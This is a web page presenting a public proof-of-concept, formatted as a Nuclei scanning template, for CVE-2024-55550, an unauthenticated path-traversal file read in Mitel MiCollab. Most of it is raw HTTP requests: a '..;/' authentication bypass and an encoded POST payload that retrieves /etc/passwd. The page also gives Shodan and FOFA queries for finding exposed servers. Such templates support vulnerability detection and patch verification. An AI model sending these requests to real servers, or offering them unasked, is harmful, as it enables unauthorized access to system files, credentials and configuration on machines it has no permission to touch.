The Mitel Collab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system on a Mitel Collab server. Exploiting this flaw involves sending specially crafted requests to the server, bypassing access controls and allowing the attacker to retrieve sensitive files.
PoC代码[已公开]
id: CVE-2024-55550
info:
name: Mitel MiCollab - Arbitary File Read
author: DhiyaneshDk,watchTowr
severity: critical
description: |
The Mitel Collab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system on a Mitel Collab server. Exploiting this flaw involves sending specially crafted requests to the server, bypassing access controls and allowing the attacker to retrieve sensitive files.
impact: |
Unauthenticated attackers can bypass authentication and exploit path traversal to read arbitrary files from the MiCollab server, exposing sensitive configuration, credentials, and system data.
remediation: |
Update Mitel MiCollab according to MISA-2024-0029 advisory to address the authentication bypass and path traversal vulnerabilities.
reference:
- https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713
- https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
- https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
classification:
epss-score: 0.11277
epss-percentile: 0.93326
metadata:
verified: true
max-request: 2
vendor: mitel
product: cmg_suite
shodan-query: http.html:"Mitel Networks"
fofa-query: body="mitel networks"
tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "users"
- "Network Element"
condition: and
internal: true
- raw:
- |
POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2F10%2FXMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E2%3C%2FtransactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3Ccriteria+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3E..%2F..%2F..%2Fetc%2Fpasswd%3C%2FreportName%3E%3C%2Fcriteria%3E%3CoperationConfig+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CdataSource%3Esummary_reports%3C%2FdataSource%3E%3CoperationType%3Efetch%3C%2FoperationType%3E%3C%2FoperationConfig%3E%3CappID%3EbuiltinApplication%3C%2FappID%3E%3Coperation%3EdownloadReport%3C%2Foperation%3E%3ColdValues+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3Ex.txt%3C%2FreportName%3E%3C%2FoldValues%3E%3C%2Felem%3E%3C%2Foperations%3E%3Cjscallback%3Ex%3C%2Fjscallback%3E%3C%2Ftransaction%3E&protocolVersion=1.0&__iframeTarget__=x
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "micollab_api:.*:.*"
# digest: 4a0a00473045022100cc51d3841a410df845ff1d3b98875d76332f597d5cf591413ac11d5e9ce6a47a0220403c5c23a6bf6f8986e3fb0c8f69dffcc645852f55a765fca4549cc737d93a88:922c64590222798bb761d5b6d8e72950